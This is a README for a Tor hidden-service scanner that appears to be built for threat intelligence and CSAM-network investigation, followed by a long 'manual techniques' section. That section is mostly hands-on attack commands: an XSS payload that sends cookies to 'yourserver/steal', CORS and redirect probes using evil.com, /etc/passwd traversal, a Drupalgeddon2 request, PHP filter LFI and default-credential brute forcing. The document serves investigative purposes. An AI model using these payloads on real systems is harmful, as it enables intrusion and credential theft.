Threat Intel tool for scanning .onion infrastructure
Developed for legitimate threat intelligence operations, red team assessments, and forensic investigation of dark web infrastructure. This scanner conducts text-only analysis of Tor hidden services to identify security misconfigurations, exposed sensitive files, and indicators of criminal networks.
# Clone the repository
git clone https://github.com/ekomsSavior/darkweb_scanner.git
cd darkweb_scanner
# Install dependencies
sudo apt update
sudo apt install tor torify python3-pip -y
pip3 install -r requirements.txt --break-system-packages
# Configure Tor for .onion resolution
sudo nano /etc/tor/torrc
Add or uncomment these lines in /etc/tor/torrc:
SocksPort 9050
ControlPort 9051
CookieAuthentication 1
DNSPort 5353
DNSListenAddress 127.0.0.1
AutomapHostsOnResolve 1
AutomapHostsSuffixes .exit,.onion
Restart Tor:
sudo systemctl restart tor
sudo systemctl enable tor
Start the scanner:
python3 vulnscan.py
Run without interaction:
# Single target
python3 vulnscan.py -t http://target.onion --batch
# Target list
python3 vulnscan.py -T targets.txt --batch
# Full options
python3 vulnscan.py -T targets.txt --batch -d 2 --delay 2 --timeout 20 -r all
Batch mode flags:
| Flag | Description |
|---|---|
-t <url> |
Single target URL |
-T <file> |
Target list file (one per line) |
-d <n> |
Crawl depth (default: 1) |
--delay <n> |
Delay between requests in seconds |
--timeout <n> |
Request timeout in seconds |
-r <fmt> |
Report format: json, text, csv, md, all |
--batch |
Run non-interactive |
| Command | Description |
|---|---|
| Target Management | |
targets |
Show all loaded targets |
add <url> |
Add a target .onion URL |
load <file> |
Load targets from file (one per line) |
remove <n> |
Remove target by number |
clear |
Clear all targets |
| Check Control | |
checks |
List all 22 checks with on/off status |
enable <n\|all> |
Enable a check or all checks |
disable <n\|all> |
Disable a check or all checks |
only <1,5,7> |
Enable ONLY listed checks, disable the rest |
| Configuration | |
config |
Show current scan configuration |
set <key> <val> |
Set config value (delay, threads, timeout, max_depth, etc.) |
| Scanning | |
scan |
Start scanning all loaded targets |
quickscan <url> |
One-command scan of a single target |
resume |
Resume an interrupted scan |
| Reports & Intel | |
report [fmt] |
Generate report (text, json, csv, md, all) |
identifiers |
Show all extracted identifiers with cross-site flags |
| OPSEC | |
rotate |
Manually rotate Tor circuit |
status |
Show scanner status, circuit count, interrupted scans |
exit |
Exit the scanner |
vulnscan> add http://target.onion
vulnscan> checks
vulnscan> only 1,2,3,5,8,12
vulnscan> set delay 2
vulnscan> set max_depth 2
vulnscan> scan
vulnscan> identifiers
vulnscan> report all
vulnscan> exit
vulnscan> quickscan http://target.onion
Clears targets, scans one URL with all enabled checks, done.
The scanner runs checks in this order. Each can be toggled on/off independently.
| # | Check | Description |
|---|---|---|
| 1 | Site Checker | Verifies target is reachable before wasting time on other checks |
| 2 | Clone/Mirror Detector | SHA256 + structural hashing to detect duplicate sites across targets |
| 3 | Page Metadata | Extracts titles, meta tags, author disclosure, language/timezone hints, HTML comments, error page fingerprinting |
| # | Check | Description |
|---|---|---|
| 4 | HTTP Security Headers | HSTS, CSP (with strength analysis), X-Frame-Options, Cache-Control, 15+ info-leak headers |
| 5 | SSL/TLS Certificate Analyzer | Extracts real domains, org names, SANs from certs. Detects .onion→clearnet redirects |
| 6 | Technology Fingerprint | CMS detection (WordPress, Drupal, Joomla) and server software from headers/HTML |
| 7 | Tech Stack Analysis | Programming languages, frameworks, libraries from headers and page content |
| 8 | Cookie Analyzer | Security flags (Secure, HttpOnly, SameSite), session tokens, tracking cookies |
| 9 | WAF Detector | Identifies Cloudflare, Akamai, ModSecurity, Sucuri, Imperva + active SQLi blocking test |
| 10 | HTTP Method Enumeration | Probes PUT, DELETE, TRACE, OPTIONS for dangerous methods |
| 11 | CORS Misconfiguration | Tests wildcard origins, origin reflection, null origin acceptance, credential leaks |
| # | Check | Description |
|---|---|---|
| 12 | Robots & Sitemap Intel | Parses robots.txt disallowed paths and sitemap.xml URLs — what admins hide |
| 13 | Sensitive Files | 160+ paths (.git, .env, backups, configs, admin panels) with SPA false-positive filtering |
| 14 | Directory Listing | Tests 13 common directories for open directory browsing |
| 15 | Open Redirect Detection | Tests 15 redirect parameters and 12 redirect endpoints with canary URL |
| 16 | Form Detector | Finds login forms, file upload forms, hidden inputs (CSRF tokens, session IDs) |
| 17 | JavaScript Analyzer | Extracts API endpoints, hardcoded keys/tokens/credentials, WebSocket URLs, referenced domains |
| # | Check | Description |
|---|---|---|
| 18 | Link Crawler | Follows links to configurable depth, discovers .onion references, flags interesting paths |
| 19 | Com/764 Network Detector | Context-aware CSAM keyword detection with false positive filtering. 70+ keywords from CAHN/FBI/Europol |
| 20 | Session ID Tracker | Extracts Session messenger IDs and correlates across targets |
| 21 | Identity Extractor | Emails, BTC/ETH/XMR wallets, Telegram, Discord, Wickr, PGP fingerprints, .onion links — all cross-site correlated |
| 22 | PGP Key Extractor | Full PGP public key blocks, fingerprints, UIDs (Name \<email>), key IDs, keyserver references |
The scan engine automatically detects when a target is fighting back:
Scan state is saved to state/scan_state.json after every target. If the process dies:
$ python3 vulnscan.py
[!] Interrupted scan detected from 2025-03-20 14:32:01
15/40 targets completed, 25 remaining
Resume? (y/n):
Type y to pick up where you left off. Type n to discard and start fresh.
rotate commandconfig/settings.pyFour report formats, generated to the reports/ directory:
report md)Human-readable with severity icons, findings grouped by check, cross-site identifier correlation section.
report json)Machine-readable with full metadata, summary, cross-site identifiers, and all finding data.
report text)Plain text with severity tags, cross-site section, detailed findings per target.
report csv)Spreadsheet format: Target, Check, Severity, Finding, Detail, URL.
report all)Generates JSON + text + CSV + Markdown simultaneously.
When scanning multiple targets, the scanner tracks identifiers across sites:
The identifiers command shows everything extracted with cross-site flags. Reports include a dedicated cross-site correlation section.
You should customize these for your specific targets.
Threat actors change their language, directory structures, and hiding spots. A wordlist that worked last month might miss things today.
wordlists/sensitive_paths.txt160+ file paths to probe. Add your own — one path per line, # for comments.
wordlists/com764_keywords.txt70+ CSAM/exploitation keywords from CAHN, FBI, and Europol advisories. Supplements the built-in detector keywords.
The scanner loads these files at startup. No code changes needed—just edit and re-run.
Edit config/settings.py for persistent changes:
# Tor connection
TOR_PROXY_PORT = 9050
TOR_CONTROL_PORT = 9051
TOR_PASSWORD = None # Set if using password auth
# Scan defaults
DEFAULT_SCAN_CONFIG = {
'delay': 1, # Seconds between requests
'threads': 1, # 1 = sequential
'timeout': 15, # Request timeout
'rotate_circuit_every': 10,
'max_depth': 1, # Crawl depth (1 = homepage only)
'follow_redirects': True,
'verify_ssl': False,
}
Or set values at runtime:
vulnscan> set delay 3
vulnscan> set max_depth 2
vulnscan> set timeout 20
darkweb_scanner/
├── vulnscan.py # CLI + batch mode entry point
├── requirements.txt # pip dependencies
├── config/
│ └── settings.py # Tor, scan defaults, User-Agents
├── core/
│ ├── tor_session.py # SOCKS5 proxy, circuit rotation, UA randomization
│ ├── scan_engine.py # Orchestration, rate limit detection, crash recovery
│ ├── scan_state.py # State persistence for crash recovery
│ ├── target_manager.py # Target loading/management
│ └── report_builder.py # JSON/text/CSV/Markdown export
├── checks/
│ ├── base_check.py # Abstract base class
│ ├── site_checker.py # Reachability check
│ ├── clone_detector.py # Duplicate site detection
│ ├── page_metadata.py # Titles, meta, language, timezone, comments
│ ├── security_headers.py # Headers + CSP analysis + cache + info leaks
│ ├── ssl_analyzer.py # TLS cert intel extraction
│ ├── fingerprint.py # CMS/server detection
│ ├── tech_stack.py # Framework/language detection
│ ├── cookie_analyzer.py # Cookie security audit
│ ├── waf_detector.py # WAF identification + active test
│ ├── http_methods.py # PUT/DELETE/TRACE enumeration
│ ├── cors_check.py # CORS misconfiguration testing
│ ├── robots_sitemap.py # robots.txt + sitemap.xml parsing
│ ├── sensitive_files.py # 160+ path enumeration with SPA filtering
│ ├── directory_listing.py # Open directory detection
│ ├── open_redirect.py # Redirect vulnerability testing
│ ├── form_detector.py # Login/upload/hidden input detection
│ ├── js_extractor.py # JS endpoint/key/credential extraction
│ ├── link_crawler.py # Link following + .onion discovery
│ ├── com764_detector.py # Context-aware CSAM detection
│ ├── session_id_tracker.py # Session messenger ID correlation
│ ├── identity_extractor.py # Multi-identifier extraction + correlation
│ ├── pgp_extractor.py # PGP key block/fingerprint extraction
│ └── port_scan.py # Optional nmap via proxychains (disabled)
├── wordlists/
│ ├── sensitive_paths.txt # 160+ sensitive file paths
│ └── com764_keywords.txt # 70+ CSAM/Com764 keywords
├── data/
│ ├── targets.txt # Sample targets
│ └── exclude_list.txt # Safe URLs to skip
├── reports/ # Generated scan reports
├── state/ # Crash recovery state files
└── utils/
├── helpers.py # URL normalization, risk scoring
├── validators.py # .onion validation, input sanitization
└── parsers.py # PDF/JSON parsing, identifier extraction
After identifying vulnerabilities with the scanner, here are manual techniques and tool recommendations to further investigate darkweb sites across different technology stacks.
If a site lacks HTTP Strict Transport Security, you can attempt protocol downgrade attacks:
# Force HTTP connection to see if site accepts insecure connections
curl -k -L --proxy socks5h://127.0.0.1:9050 http://target.onion
# Check if HTTPS is even supported
curl -k -L --proxy socks5h://127.0.0.1:9050 https://target.onion
# If both work, test for session token leakage over HTTP
curl -v --proxy socks5h://127.0.0.1:9050 http://target.onion/login
Without Content Security Policy, test for XSS vulnerabilities:
# Basic XSS payload test
curl --proxy socks5h://127.0.0.1:9050 "http://target.onion/search?q=<script>alert(1)</script>"
# Try to steal cookies with XSS (requires finding an injection point first)
# Payload: <script>fetch('http://yourserver/steal?cookie='+document.cookie)</script>
Test if site can be framed:
# Create a simple HTML test page
cat > clickjack_test.html << EOF
<html>
<head><title>Clickjack Test</title></head>
<body>
<iframe src="http://target.onion" width="800" height="600"></iframe>
<p>If you see the site above, it's vulnerable to clickjacking</p>
</body>
</html>
EOF
# Serve it locally and access through Tor Browser
python3 -m http.server 8080
# Then visit http://127.0.0.1:8080/clickjack_test.html in Tor Browser
If the scanner flags wildcard or reflected origins:
# Test origin reflection
curl -H "Origin: https://evil.com" -I --proxy socks5h://127.0.0.1:9050 http://target.onion/api/
# Check for credential leakage with CORS
curl -H "Origin: https://evil.com" --proxy socks5h://127.0.0.1:9050 http://target.onion/api/user -v 2>&1 | grep -i "access-control"
# Test null origin (sandboxed iframe bypass)
curl -H "Origin: null" -I --proxy socks5h://127.0.0.1:9050 http://target.onion/api/
If the scanner finds open redirects:
# Verify the redirect manually
curl -I --proxy socks5h://127.0.0.1:9050 "http://target.onion/login?next=https://evil.com"
# Chain with XSS for credential theft
# http://target.onion/redirect?url=javascript:alert(document.cookie)
# Check nginx version from headers
curl -I --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i server
# Common nginx paths to check
for path in /nginx_status /status /metrics /nginx.conf .nginx.conf; do
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion$path" | head -20
done
# Check for nginx alias traversal vulnerability
curl --proxy socks5h://127.0.0.1:9050 "http://target.onion/assets../etc/passwd"
# Test for off-by-slash path traversal
curl --proxy socks5h://127.0.0.1:9050 "http://target.onion/assets../assets/"
# Look for nginx default error pages that reveal paths
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/nonexistent" | grep -i nginx
# Check Apache version
curl -I --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i server
# Check for mod_status exposure
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/server-status"
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/server-info"
# Check for .htaccess access
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/.htaccess"
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/.htpasswd"
# Test for CGI exposure
for cgi in /cgi-bin/test.cgi /cgi-bin/printenv /cgi-bin/php; do
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion$cgi" | head -20
done
# Check for Apache Tomcat instances
for path in /manager/html /host-manager/html /examples; do
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion:8080$path" | head -5
done
# Check IIS version
curl -I --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i server
# Check for asp.net debug pages
for path in /trace.axd /elmah.axd /web.config /bin; do
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion$path" | head -20
done
# Test for short filename disclosure (IIS 8.3)
for i in {a..z}; do
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/*~1*$i*" -I | head -1
done
# Check for phpMyAdmin
for path in /phpmyadmin /pma /myadmin /phpMyAdmin /mysql /db; do
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion$path/" | grep -i "phpmyadmin\|welcome"
done
# Check for MySQL error exposure
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/index.php?id=1'" | grep -i "mysql\|sql"
# Look for SQL backup files
for file in .sql .bak .backup .dump .sql.gz; do
for name in backup db database data sql mysql; do
curl -I --proxy socks5h://127.0.0.1:9050 "http://target.onion/$name$file"
done
done
# Check for MySQL connection strings in JS files
wget --proxy=on -e use_proxy=yes -e http_proxy=socks5h://127.0.0.1:9050 \
-r -l2 -A.js http://target.onion/
grep -r -E "(mysql://|mysqli_connect|mysql_connect|localhost.*root)" ./
# Check for pgAdmin
for path in /pgadmin /phppgadmin /pgsql /postgres; do
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion$path/" | grep -i "pgadmin\|postgres"
done
# Look for PostgreSQL connection strings
grep -r -E "(postgresql://|postgres://|PGPASSWORD|PGUSER)" ./
# Check for MongoDB web interfaces
for port in 27017 27018 28017; do
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion:$port/" | head -10
done
# Look for MongoDB connection strings
grep -r -E "(mongodb://|mongo://|MONGO_URI)" ./
# Check for WordPress
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i "wp-content\|wp-includes"
# WordPress vulnerability scanning through Tor
wpscan --url http://target.onion --proxy socks5h://127.0.0.1:9050 --enumerate u,vp
# Check for wp-config.php access
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/wp-config.php
# List users
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/wp-json/wp/v2/users | jq .
# Check for XML-RPC
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/xmlrpc.php -X POST -d "<methodCall><methodName>system.listMethods</methodName></methodCall>"
# Check for Joomla
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i "joomla"
# Check for configuration.php
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/configuration.php
# Joomla vulnerability scan
joomscan --url http://target.onion --proxy socks5h://127.0.0.1:9050
# Check for Drupal
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i "drupal\|sites/default"
# Check for settings.php
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/sites/default/settings.php
# Drupalgeddon2 test
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup"
Gatsby sites often leak valuable information:
# Check for exposed page-data (contains site structure)
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/page-data/ | grep -o '"path":"[^"]*"'
# Look for component chunks (may contain hardcoded credentials)
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/page-data/app-data.json
# Check for GraphQL endpoint
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/___graphql -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}'
# If GraphQL is enabled, dump entire schema
cat > graphql_query.txt << EOF
{"query":"{__schema{types{name,fields{name,type{name}}}}}"}
EOF
curl -X POST --proxy socks5h://127.0.0.1:9050 http://target.onion/___graphql \
-H "Content-Type: application/json" \
-d @graphql_query.txt
# Extract JavaScript bundles and search for secrets
wget --proxy=on -e use_proxy=yes -e http_proxy=socks5h://127.0.0.1:9050 \
-r -l1 -A.js http://target.onion/
grep -r -E "(api[_-]?key|secret|token|password|aws|AKIA)" ./target.onion/
# Check for Flask
curl -I --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i "flask"
# Look for debug mode
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/notfound" | grep -i "debug"
# Check for Werkzeug debugger
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/console" | grep -i "werkzeug"
# Django admin finder
for path in /admin /dashboard /manage /backend; do
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion$path/" | grep -i "django"
done
# Check for Django settings exposure
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/settings.py"
# Check for PHP version
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/phpinfo.php"
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/info.php"
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/test.php"
# Check for PHP session files
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/sessions/"
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/tmp/"
# PHP wrapper exploitation if LFI found
# Example: php://filter/convert.base64-encode/resource=index.php
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/page?file=php://filter/convert.base64-encode/resource=config.php"
# Check for PHPMyAdmin setup
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/phpmyadmin/setup"
# Check for Express
curl -I --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i "x-powered-by"
# Look for package.json
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/package.json"
# Check for .env file
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/.env"
# Look for server.js/app.js
for file in server.js app.js index.js main.js; do
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/$file" | head -20
done
# Check for node_modules exposure
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/node_modules/"
Beyond the scanner's default wordlist, use targeted wordlists:
# Install tools if needed
sudo apt update && sudo apt install gobuster dirb wfuzz -y
# Use gobuster through Tor
export HTTP_PROXY=socks5h://127.0.0.1:9050
export HTTPS_PROXY=socks5h://127.0.0.1:9050
# Common dark web directories
gobuster dir -u http://target.onion -w /usr/share/wordlists/dirb/common.txt -t 5
# Check for admin panels
gobuster dir -u http://target.onion -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-x php,html,txt -p /usr/share/wordlists/dirb/big.txt
# Technology-specific wordlists
cat > tech_paths.txt << EOF
# PHP
/phpinfo.php
/info.php
/test.php
/php.ini
/.user.ini
# Python
/console
/__pycache__
/.python-version
/requirements.txt
/Pipfile
# Node
/package.json
/package-lock.json
/yarn.lock
/node_modules
/.npmrc
# Git
/.git/config
/.git/HEAD
/.git/index
/.gitignore
# Docker
/Dockerfile
/.dockerignore
/docker-compose.yml
# AWS
/.aws/credentials
/.aws/config
# SSH
/.ssh/id_rsa
/.ssh/authorized_keys
/.ssh/config
# Databases
/.sql
/.db
/.sqlite
/.mysql_history
/.psql_history
EOF
gobuster dir -u http://target.onion -w tech_paths.txt -t 5
Common admin paths to check manually:
# Test each path manually
for path in admin administrator adminpanel dashboard manage control backend cms wp-admin; do
echo -n "Checking /$path... "
curl -s -o /dev/null -w "%{http_code}" --proxy socks5h://127.0.0.1:9050 \
"http://target.onion/$path/" && echo ""
done
# Check for default credentials
for cred in admin:admin admin:password admin:123456 administrator:admin root:root; do
username=$(echo $cred | cut -d: -f1)
password=$(echo $cred | cut -d: -f2)
# For basic auth
curl -u $username:$password --proxy socks5h://127.0.0.1:9050 \
"http://target.onion/admin/" -I
done
# Test common CMS logins
for path in /wp-login.php /administrator /user/login /login.php; do
curl -X POST --proxy socks5h://127.0.0.1:9050 \
-d "log=admin&pwd=admin" \
"http://target.onion$path" -I
done
Gatsby, React, Vue and other SPAs often have hidden routes in JavaScript:
# Download all JavaScript files
wget --proxy=on -e use_proxy=yes -e http_proxy=socks5h://127.0.0.1:9050 \
-r -l2 -A.js,js.map http://target.onion/
# Extract routes from JS files
find target.onion -name "*.js" -exec grep -o -E "path:['\"]([^'\"]+)['\"]|route:['\"]([^'\"]+)['\"]" {} \; | sort -u
# Look for React Router routes
grep -r -E "path=['\"]\/[a-zA-Z0-9_\/-]+['\"]" target.onion/
# Vue routes
grep -r -E "name: ['\"][a-zA-Z0-9_-]+['\"]" target.onion/
# Angular routes
grep -r -E "path: ['\"][a-zA-Z0-9_\/-]+['\"]" target.onion/
# Extract all strings that look like URLs
find target.onion -name "*.js" -exec strings {} \; | grep -E "https?://[^\"'\\s]+" | sort -u
# Look for API endpoints
grep -r -E "fetch\(['\"]([^'\"]+)['\"]|axios\.(get|post)\(['\"]([^'\"]+)['\"]" target.onion/
Check JavaScript bundles and config files for leaked secrets:
# Download and search JS files
wget --proxy=on -e use_proxy=yes -e http_proxy=socks5h://127.0.0.1:9050 \
-r -l2 -A.js http://target.onion/
# Search for common environment variable patterns
grep -r -E "(API_KEY|SECRET|PASSWORD|TOKEN|AKIA|sk_live|pk_live|GATSBY_|REACT_APP_|VUE_APP_|NEXT_PUBLIC_)" target.onion/
# Look for .env patterns in JS
grep -r -E "process\.env\.[A-Z_]+" target.onion/
# Search for base64 encoded credentials
find target.onion -name "*.js" -exec grep -E "([A-Za-z0-9+/]{40,}={0,2})" {} \;
# Check for hardcoded AWS keys
grep -r -E "AKIA[0-9A-Z]{16}" target.onion/
# Check for JWT tokens
grep -r -E "eyJ[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+" target.onion/
If you find any dynamic routes like /user/123 or /post/456:
# Create a list of potential IDs to test
seq 1 100 > ids.txt
# Test each ID
while read id; do
echo -n "Checking /user/$id... "
curl -s -o /dev/null -w "%{http_code}\n" --proxy socks5h://127.0.0.1:9050 \
"http://target.onion/user/$id"
done < ids.txt | grep -v "404"
# Test for GUIDs/UUIDs
cat > uuids.txt << EOF
00000000-0000-0000-0000-000000000000
11111111-1111-1111-1111-111111111111
12345678-1234-1234-1234-123456789012
aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa
ffffffff-ffff-ffff-ffff-ffffffffffff
EOF
while read uuid; do
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/user/$uuid" -I | head -1
done < uuids.txt
# Test for path traversal in file downloads
for traversal in ../../../etc/passwd ..\\..\\..\\windows\\win.ini ....//....//....//etc/passwd; do
echo -n "Testing $traversal... "
curl -s --proxy socks5h://127.0.0.1:9050 \
"http://target.onion/download?file=$traversal" | head -20
done
# Test for parameter pollution
curl -s --proxy socks5h://127.0.0.1:9050 \
"http://target.onion/api/user?id=1&id=2" | jq .
Build a network graph of related sites:
# Create a script to correlate identifiers
cat > correlate.sh << 'EOF'
#!/bin/bash
TARGET=$1
echo "Analyzing $TARGET..."
# Get all identifiers
curl -s --proxy socks5h://127.0.0.1:9050 $TARGET > page.html
# Extract all identifiers
emails=$(grep -o -E "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" page.html | sort -u)
btc=$(grep -o -E "\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b" page.html | sort -u)
xmr=$(grep -o -E "\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b|\b8[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b" page.html | sort -u)
session_ids=$(grep -o -E "05[a-f0-9]{62,64}" page.html | sort -u)
telegram=$(grep -o -E "t\.me/[a-zA-Z0-9_]+|@[a-zA-Z0-9_]{5,}" page.html | sort -u)
discord=$(grep -o -E "discord\.gg/[a-zA-Z0-9]+" page.html | sort -u)
onions=$(grep -o -E "[a-zA-Z0-9]{56}\.onion" page.html | sort -u)
pgp=$(grep -o -E "-----BEGIN PGP PUBLIC KEY BLOCK-----" page.html | wc -l)
echo "Emails: $emails"
echo "BTC: $btc"
echo "XMR: $xmr"
echo "Session IDs: $session_ids"
echo "Telegram: $telegram"
echo "Discord: $discord"
echo "Linked .onions: $onions"
echo "PGP Keys: $pgp"
# Save for correlation
echo "$TARGET|$emails|$btc|$xmr|$session_ids|$telegram|$discord" >> correlation_db.txt
EOF
chmod +x correlate.sh
# Run against multiple targets
./correlate.sh http://target1.onion
./correlate.sh http://target2.onion
# Find common identifiers
echo "=== Common Emails ==="
cat correlation_db.txt | grep -o -E "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort | uniq -c | sort -nr
echo "=== Common BTC Wallets ==="
cat correlation_db.txt | grep -o -E "\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b" | sort | uniq -c | sort -nr
echo "=== Common Session IDs ==="
cat correlation_db.txt | grep -o -E "05[a-f0-9]{62,64}" | sort | uniq -c | sort -nr
When you find evidence, format it properly:
# Generate NCMEC CyberTipline format
cat > ncmec_report.txt << EOF
Date: $(date +%Y-%m-%d)
URL: http://target.onion
FINDINGS:
$(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i -E "child|cp|lolita|764|pedo|young|teen|preteen" | head -20)
IDENTIFIERS:
Emails: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | tr '\n' ',')
BTC Wallets: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b|\bbc1[a-zA-Z0-9]{38,}\b" | sort -u | tr '\n' ',')
XMR Wallets: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b|\b8[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b" | sort -u | tr '\n' ',')
Session IDs: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "05[a-f0-9]{62,64}" | sort -u | tr '\n' ',')
Telegram: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "t\.me/[a-zA-Z0-9_]+|@[a-zA-Z0-9_]{5,}" | sort -u | tr '\n' ',')
Discord: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "discord\.gg/[a-zA-Z0-9]+" | sort -u | tr '\n' ',')
TECHNICAL DETAILS:
Server: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion -I | grep -i server)
Generator: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i generator | head -1)
LINKED .ONION SITES:
$(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "[a-zA-Z0-9]{56}\.onion" | sort -u)
EOF
echo "Report saved to ncmec_report.txt"
echo "Submit at: https://report.cybertip.org/"
# FBI IC3 format
cat > ic3_report.txt << EOF
IC3 COMPLAINT - CHILD EXPLOITATION
Date Discovered: $(date +%Y-%m-%d)
.onion URL: http://target.onion
Description of Illicit Content:
$(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i -E "child|cp|lolita|764|pedo" | head -10)
Associated Identifiers:
- Email addresses: [list emails]
- Cryptocurrency wallets: [list wallets]
- Session IDs: [list session IDs]
- Chat platform invites: [list invites]
Technical Infrastructure:
- Web Server: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion -I | grep -i server)
- Technology Stack: [identified from fingerprinting]
- Linked Domains: [list linked .onion]
Submit at: https://www.ic3.gov/
EOF
# Install all recommended tools
sudo apt update
sudo apt install -y gobuster dirb wfuzz curl wget grep tor torify proxychains4 nmap nikto whatweb jq
# Install additional tools
pip3 install pygobuster httpx nuclei wpscan joomscan
# Install special tools
git clone https://github.com/drwetter/testssl.sh.git
cd testssl.sh && chmod +x testssl.sh
# Verify Tor is working
torify curl https://check.torproject.org/api/ip
| Technology | Key Files/Paths | Testing Commands |
|---|---|---|
| Nginx | /nginx_status, /status |
curl -I \| grep Server |
| Apache | /server-status, /.htaccess |
curl /server-status |
| IIS | /trace.axd, /elmah.axd |
curl /trace.axd |
| MySQL | /phpmyadmin, .sql backups |
grep -r "mysql://" |
| PostgreSQL | /pgadmin, postgres:// |
grep -r "postgresql://" |
| MongoDB | mongodb://, port 27017 |
curl port:27017 |
| WordPress | wp-content, wp-config.php |
wpscan |
| Joomla | configuration.php |
joomscan |
| Drupal | sites/default/settings.php |
drupalgeddon2 |
| Gatsby | /page-data/, /___graphql |
curl /___graphql |
| Flask | /console, debug mode |
curl /notfound |
| Django | /admin, settings.py |
curl /admin |
| Node.js | package.json, .env |
curl /package.json |
| PHP | phpinfo.php, ini.php |
curl /phpinfo.php |
This tool is designed for legitimate security assessments, threat intelligence operations, and forensic investigations. Users must obtain explicit written authorization before scanning any systems or networks. Unauthorized scanning of .onion services or any other infrastructure may violate local, national, and international laws. The developer assumes no liability for misuse or illegal activities conducted with this software.
// click a file to view source